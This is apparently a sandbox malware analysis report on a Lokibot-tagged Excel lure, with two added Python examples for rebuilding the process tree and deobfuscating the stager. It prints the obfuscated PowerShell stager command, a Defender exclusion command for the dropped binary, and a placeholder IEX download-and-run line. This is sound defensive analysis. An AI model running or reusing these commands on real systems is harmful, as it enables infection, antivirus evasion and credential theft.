Malware Analysis Report

2025-04-03 09:51

Sample ID 241118-wc362awqhm
Target PO-000041492.xls
SHA256 555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7

Threat Level: Known bad

The file PO-000041492.xls was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Lokibot

Lokibot family

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Evasion via Device Credential Deployment

Blocklisted process makes network request

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy WMI provider

outlook_office_path

Checks processor information in registry

Uses Task Scheduler COM API

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-18 17:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-18 17:47

Reported

2024-11-18 17:50

Platform

win7-20240903-en

Max time kernel

140s

Max time network

151s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 968 set thread context of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
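
The rows above record the whole injection chain, but as a flat list it is hard to see who spawned whom. The following Python is added here as an example; it is not part of the sandbox report or of the sample. It parses the de-duplicated WriteProcessMemory rows together with the SetThreadContext row from the section above, prints the lineage of PID 2292, and flags the edges a detection rule would key on. The rule names are this example's own, not the report's signature names.

```python
"""Added example (not part of the sandbox report): rebuild the behavioral1
process tree from the WriteProcessMemory and SetThreadContext rows and flag
the parent/child pairs a detection rule would key on. The rows are copied
from the report and de-duplicated; the rule names are this example's own."""
import ntpath
import re

ROWS = r"""
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 set thread context of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
"""

ROW = re.compile(
    r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (.+?\.exe) (.+?\.exe)$",
    re.I | re.M,
)
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
OFFICE_OR_HTA = {"excel.exe", "winword.exe", "powerpnt.exe", "mshta.exe"}


def name(path):
    # Image names are compared case-insensitively: the stager spells its own
    # path as winDoWSPOwErshELl\v1.0\pOWERSHELl.exE.
    return ntpath.basename(path).lower()


def parse_rows(text):
    """Return (writes, ctx, image): WriteProcessMemory edges, SetThreadContext
    edges, and a pid -> image path map. Repeated rows collapse into one edge."""
    writes, ctx, image = set(), set(), {}
    for src, kind, dst, src_img, dst_img in ROW.findall(text):
        src, dst = int(src), int(dst)
        image[src], image[dst] = src_img, dst_img
        (ctx if kind.lower().startswith("set") else writes).add((src, dst))
    return writes, ctx, image


def lineage(pid, writes, image):
    """Image names from the root of the tree down to pid."""
    parent = {dst: src for src, dst in writes if src != dst}
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [name(image[p]) for p in reversed(chain)]


def suspicious(writes, ctx, image):
    """Findings as (rule, parent_pid, child_pid), one per matching edge."""
    findings = []
    for src, dst in sorted(writes):
        p, c = name(image[src]), name(image[dst])
        if p in OFFICE_OR_HTA and c in SCRIPT_HOSTS:
            findings.append(("script host spawned from Office/mshta", src, dst))
        if p == "powershell.exe" and c == "csc.exe":
            findings.append(("PowerShell compiling C# on the fly", src, dst))
        if "\\appdata\\" in image[src].lower() and c == "powershell.exe":
            findings.append(("AppData binary launching PowerShell", src, dst))
        if image[src].lower() == image[dst].lower():
            # A write into a fresh copy of itself plus SetThreadContext on the
            # same pair is the classic hollowing sequence; without the context
            # change it is only a suspicious self-spawn.
            rule = ("self-injection with SetThreadContext (hollowing)"
                    if (src, dst) in ctx else "spawned a copy of itself")
            findings.append((rule, src, dst))
    return findings


if __name__ == "__main__":
    writes, ctx, image = parse_rows(ROWS)
    print(" -> ".join(lineage(2292, writes, image)))
    for rule, src, dst in suspicious(writes, ctx, image):
        print(f"{rule}: {src} ({name(image[src])}) -> {dst} ({name(image[dst])})")
```

Only PID 2292 gets both the memory write and the thread-context change, which is why it is the copy of caspol.exe whose memory dumps at 0x400000 appear in the Files section; the three earlier caspol.exe children received writes only.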

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE

"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'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'+[ChAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qk93a-ep.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5CB.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"
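
The first pOWERSHELl.exE command line above hides a plain .NET call behind mixed case, [char] casts and string concatenation, and the later powershell.exe instance adds a Defender exclusion for the dropped caspol.exe. The following Python is added here as an example; it is not part of the sandbox report or of the sample. It folds the [char] and '+' tricks back into the readable FromBase64String call, decodes its argument, and flags the switches (-EX BYpaSS, -nOP, -W 1, Invoke-Expression, the DeviceCredentialDeployment token, Add-MpPreference -ExclusionPath) that a triage rule should match case-insensitively. The real base64 blob was removed from this page, so a constructed placeholder stands in for it; the flag names and regexes are this example's own.

```python
"""Added example (not part of the sandbox report): deobfuscate the
mshta-launched PowerShell stager from behavioral1 and flag the command-line
switches a triage rule should key on. The base64 payload is a constructed
placeholder because the real one was removed from the page."""
import base64
import re
from typing import List, Optional

# Constructed stand-in payload; the report's real blob is not reproduced here.
PLACEHOLDER_B64 = base64.b64encode(
    b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"
).decode()

# Same shape as the report's stager, with the placeholder substituted.
SAMPLE_STAGER = (
    "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; "
    "iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A"
    "+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'"
    + PLACEHOLDER_B64 + "'+[ChAR]34+'))')))"
)
# The later powershell.exe instance spawned by caspol.exe, as in the report.
SAMPLE_EXCLUSION = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'Add-MpPreference -ExclusionPath "C:\\Users\\Admin\\AppData\\Roaming\\caspol.exe"'
)

CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)   # [CHar]0X3A, [CHar]58
JOIN = re.compile(r"'\s*\+\s*'")                                  # 'a'+'b' -> 'ab'
B64_ARG = re.compile(r"frombase64string\(\s*[\"']?([A-Za-z0-9+/=]+)", re.I)

# Names are this example's own. Switch prefixes are matched in abbreviated
# form because PowerShell accepts any unambiguous prefix (-ex, -nop, -w).
FLAG_RULES = {
    "execution-policy bypass": re.compile(r"-e(?:x|p|xecutionpolicy)\s+bypass", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "invoke-expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "base64 payload": re.compile(r"frombase64string", re.I),
    "device credential deployment": re.compile(r"devicecredentialdeployment", re.I),
    "defender exclusion": re.compile(r"add-mppreference\s+-exclusionpath", re.I),
}


def fold_char_casts(cmd: str) -> str:
    """Replace every [char]N / [char]0xNN with the quoted literal character,
    then merge the 'a'+'b' concatenations so the real .NET call is visible."""
    def to_literal(m):
        tok = m.group(1)
        code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
        return "'" + chr(code) + "'"
    return JOIN.sub("", CHAR_TOKEN.sub(to_literal, cmd))


def extract_payload(cmd: str) -> Optional[str]:
    """Decoded FromBase64String argument, or None when the line has none."""
    m = B64_ARG.search(fold_char_casts(cmd))
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


def flag_command(cmd: str) -> List[str]:
    """Rule names that fire on the (deobfuscated) command line. Matching is
    case-insensitive throughout; the sample mixes case in both the image path
    and the switches, so a case-sensitive rule would miss it."""
    folded = fold_char_casts(cmd)
    return [rule for rule, rx in FLAG_RULES.items() if rx.search(folded)]


if __name__ == "__main__":
    for cmd in (SAMPLE_STAGER, SAMPLE_EXCLUSION):
        print(flag_command(cmd))
        print(extract_payload(cmd))
```

The folding step is what makes the rule on FromBase64String reliable: before it, the string '[sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string(' never contains the token "::FromBase64String" as one substring, so a naive pattern would miss it.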

Network

Country Destination Domain Proto
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.135.105:80 e6.o.lencr.org tcp
US 66.63.187.231:80 66.63.187.231 tcp
DE 5.45.108.48:443 link.uebie.de tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
DE 94.156.177.95:80 tcp
DE 94.156.177.95:80 tcp

Files

memory/2636-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2636-1-0x000000007403D000-0x0000000074048000-memory.dmp

memory/2684-18-0x0000000002640000-0x0000000002642000-memory.dmp

memory/2636-19-0x0000000002510000-0x0000000002512000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B083487247EB8FBD76503EF0DA269B6B

MD5 dfe9d40108cd6499968560d0319998c6
SHA1 6b79281f7efec1b9fb942e6e0cd3eb5e9f776e73
SHA256 1dc7e4150fff57a7423b4d0ebeb3a5f966593b4dad4b803840f6c4a2f814951e
SHA512 5d4d685a5f15372d4ae8fdc08ab92d2f2f173f586b58315d35a62318f71b9fce7f84b4501f50024e95225a53856ab8170bcf1adf8805eaddb392250082c9ff56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B083487247EB8FBD76503EF0DA269B6B

MD5 0119335333261c14936f2646c0471b15
SHA1 d83abad73fafbcb44b5ffa5d06ca1d3b97959c3e
SHA256 323399364e979e8ada741b823f7f8a8bd035a36c4ba4b1a2fd101057d4251dec
SHA512 3dbb5c60cb09220ccdc4062aa37ab50b73792882118940dc2b3adf9efd355d09a25b3ae26d8786f99a69da474ee8b091fcef77618957ed0a18506be01b966c31

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 18ed994e35845483e698cd86e55a8bf2
SHA1 c8816e93af865a45fa20c1cbcc9fd69fc29c4e75
SHA256 29f3037a0ec5d1ffa6dfd710258220b423e158e1a39e1fb3a009077cbccf3cb1
SHA512 a6217f931ebdc0aa4ebd95a86a0db911a2dbdd654ea72d1c1ea0d4c89ffaffabca2abf16e94e082d8ebc59e561f2df5bdce50884b5bf17f08e600d0bca54568e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 512bd3fdb8071bbb4d35ce589fe6571c
SHA1 e17d4c26d10fe5e709b3a3549006eb244529e6f7
SHA256 ce8a12bc8036707ad6c2c865bc1a8e97540361e07e62b27e5f7ea4d3e60165fc
SHA512 27ce8cb7c2931ccb00813922ddffe2b5f4d7302670e6fdda06ab677ba56d74f52511a592bbc84f2e946e7addae14cd05ad6e4ca67732005dc560bcf336185622

C:\Users\Admin\AppData\Local\Temp\CabF058.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

